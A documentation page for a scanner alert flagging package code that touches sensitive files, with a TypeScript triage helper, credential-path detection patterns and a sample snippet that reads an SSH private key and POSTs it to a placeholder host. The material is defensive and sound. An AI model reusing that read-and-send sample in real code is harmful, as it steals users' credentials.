sensitiveFileAccess
Rendered from docs/alerts/sensitiveFileAccess.md
Flags code that reads/writes sensitive file paths (for example SSH keys, cloud credentials, .npmrc, browser tokens).
Implemented in: src/lib/detection/plugins/sensitive-file-access.ts
Enabled by default: yes
What it means
The package contains filesystem access patterns targeting well-known sensitive locations.
Why it matters
Stealing local secrets is one of the highest-impact outcomes of dependency compromise.
What to do
- Identify exactly which paths are being accessed and under what conditions.
- Look for subsequent network sends or archive/encryption steps.
- Treat unexpected access as critical when combined with networkAccess/c2Communication.
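The triage steps above, sketched as an added example; this is not the plugin's code from src/lib/detection/plugins/sensitive-file-access.ts. The path patterns, network hints, severity labels and sample sources are assumptions made for illustration.

```typescript
// Added example: a triage helper, not the project's plugin code.
// Pattern lists are illustrative assumptions, not the plugin's actual rules.
const SENSITIVE_PATHS: [string, RegExp][] = [
  ["ssh-key", /\.ssh\/(id_[a-z0-9]+|authorized_keys)/i],
  ["aws-credentials", /\.aws\/credentials/i],
  ["npmrc", /\.npmrc\b/i],
];
const NETWORK_HINTS = /\b(https?\.request|fetch\s*\(|net\.connect|axios\.)/;

interface Hit { label: string; line: number; snippet: string; }
interface Triage { hits: Hit[]; networkLines: number[]; severity: "none" | "review" | "critical"; }

// Step 1: list which sensitive paths are touched and where.
// Step 2: list lines that look like network sends.
// Step 3: escalate when a send appears at or after the first sensitive access.
function triageSource(source: string): Triage {
  const hits: Hit[] = [];
  const networkLines: number[] = [];
  source.split("\n").forEach((text, i) => {
    for (const [label, re] of SENSITIVE_PATHS) {
      if (re.test(text)) hits.push({ label, line: i + 1, snippet: text.trim() });
    }
    if (NETWORK_HINTS.test(text)) networkLines.push(i + 1);
  });
  const firstHit = hits.length ? hits[0].line : Infinity;
  const sendsAfter = networkLines.some((n) => n >= firstHit);
  const severity = hits.length === 0 ? "none" : sendsAfter ? "critical" : "review";
  return { hits, networkLines, severity };
}

// Constructed sample inputs (not taken from any real package).
const SAMPLE_SUSPICIOUS = [
  'const fs = require("fs"), os = require("os"), https = require("https");',
  'const key = fs.readFileSync(os.homedir() + "/.ssh/id_rsa", "utf8");',
  'const req = https.request({ host: "collector.example", method: "POST" });',
  'req.end(key);',
].join("\n");
const SAMPLE_BENIGN = 'const rc = fs.readFileSync(path.join(projectDir, ".npmrc"), "utf8");';
```

A "review" result still needs the first step done by hand: a project-local .npmrc read is routine, while the same read under the user's home directory is not.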
Common fields
- filePath, lineStart/lineEnd, codeSnippet
- metadata may include the matched path pattern(s)